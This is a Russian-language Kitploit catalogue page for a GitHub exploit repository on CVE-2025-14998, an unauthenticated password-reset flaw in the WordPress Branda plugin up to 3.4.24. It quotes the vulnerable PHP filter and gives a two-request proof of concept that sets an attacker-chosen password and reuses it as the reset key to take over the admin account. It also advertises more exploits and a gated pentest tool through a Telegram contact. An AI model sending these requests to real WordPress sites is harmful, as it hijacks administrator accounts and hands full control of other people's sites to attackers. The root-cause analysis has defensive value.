Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/ktn1990/cve-2025-14998
Атаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификация
GitHubktn1990/cve-2025-14998

CVE-2025-14998

CVE-2025-14998 WordPress 插件 - Branda – White Label & Branding, Free Login Page Customizer <= 3.4.24 - 通过帐户接管实现未认证权限提升

Репозиторий
228 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Wordpress Branda – White Label & Branding, Free Login Page Customizer <= 3.4.24 - Неаутентифицированное повышение привилегий через захват аккаунта

CVE-2025-14998 Плагин Branda для WordPress уязвим к повышению привилегий через захват аккаунта во всех версиях до 3.4.24 включительно. Это связано с тем, что плагин не проверяет должным образом личность пользователя перед обновлением его пароля. Это позволяет неаутентифицированным злоумышленникам изменять пароли произвольных пользователей, включая администраторов, и использовать это для получения доступа к их аккаунту.

За дополнительными уязвимостями WordPress и эксклюзивными инструментами для пентеста свяжитесь со мной в Telegram @KtN1990.

🔍 Анализ первопричины

Плагин переопределяет логику генерации паролей WordPress, подключаясь к фильтру random_password. Вместо того чтобы позволить WordPress сгенерировать безопасный случайный пароль, плагин заменяет его на вводимые пользователем данные.

Уязвимый код

root@kitploit:~
public function password_random_password_filter( $password ) {
    global $wpdb, $signup_password_use_encryption;

    if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
        $key = $_GET['key'];
    } elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
        $key = $_POST['key'];
    }

    if ( ! empty( $_POST['password_1'] ) ) {
        $password = $_POST['password_1'];
    } elseif ( ! empty( $key ) ) {
        $signup = $wpdb->get_row(
            $wpdb->prepare(
                "SELECT * FROM $wpdb->signups WHERE activation_key = '%s'",
                $key
            )
        );

        if ( ! ( empty( $signup ) || $signup->active ) ) {
            $meta = maybe_unserialize( $signup->meta );

            if ( ! empty( $meta['password'] ) ) {
                if ( 'yes' === $signup_password_use_encryption ) {
                    $password = $this->password_decrypt( $meta['password'] );
                } else {
                    $password = $meta['password'];
                }
            }
        }
    }

    return $password;
}

🧪 Доказательство концепции (очищенное)

Шаг 1 — Запуск сброса пароля с произвольным паролем

root@kitploit:~
POST /wp/wp-login.php?action=lostpassword HTTP/1.1
Host: example.local
Content-Type: application/x-www-form-urlencoded

user_login=admin&
redirect_to=&
password_1=EfUSmvnTun5XbvE6RvIB&
wp-submit=Get+New+Password

Значение password_1 может быть любой строкой, контролируемой злоумышленником.


Шаг 2 — Завершение сброса с использованием того же значения в качестве ключа сброса

root@kitploit:~
GET /wp/wp-login.php?login=admin&key=EfUSmvnTun5XbvE6RvIB&action=rp HTTP/1.1
Host: example.local

✅ Результат

  • WordPress принимает пароль, контролируемый злоумышленником
  • Пароль администратора изменен
  • Злоумышленник может аутентифицироваться как затронутый пользователь

Не требуется доступ к электронной почте или действительный токен сброса пароля.


💥 Воздействие

Неаутентифицированный злоумышленник может:

  • Сбрасывать пароли для любого пользователя WordPress
  • Захватывать учетные записи администраторов
  • Получать полный контроль над установкой WordPress
  • Изменять плагины, темы или контент

Контакты

  • @KtN1990

Больше уязвимостей, смотрите Megatron!

Логотип

  • 💣 Что такое Megatron? Megatron — это продвинутый инструмент тестирования на проникновение, предназначенный для серьезных тестировщиков и участников красных команд. Аудируете ли вы, сканируете или тестируете инфраструктуры, Megatron дает вам необходимую мощность.

-🛡️ Идеально подходит для: – Исследователей безопасности – Тестировщиков на проникновение – Этичных хакеров

  • 📦 Поддерживаемая линейка с ~230 устаревшими модулями исследований; недавние улучшения ядра сканера для стабильности и обнаружения.

  • 🎯 Назначение: Предоставляется строго для авторизованного тестирования безопасности, образования, оборонительных исследований и тренировок красных команд. Этот релиз не предназначен для незаконного использования. Распространение ограничено — доступ только после проверки и подписания Соглашения об ответственном использовании / NDA.

-🛡 Политика ответственного доступа (кратко):

  1. Доступ только для проверенных специалистов по безопасности, корпоративных команд безопасности, аккредитованных лабораторий или учебных заведений.
  2. Вы должны предоставить название организации, роль, официальный корпоративный адрес электронной почты и законную цель.
  3. Полная загрузка предоставляется только после проверки и подписания нашего Соглашения об ответственном использовании / NDA.
  4. Нулевая терпимость к злоупотреблениям — доказательства злонамеренного использования приводят к отзыву доступа и сообщению в соответствующие органы.
  • 📩 Контакты / Запросы / Верификация: @KtN1990 — укажите организацию, роль и краткую причину доступа. Telegram-канал

Демонстрация

ТЕКСТ АЛЬТЕРНАТИВНОГО ИЗОБРАЖЕНИЯ

Лицензия

MIT

Скачать инструмент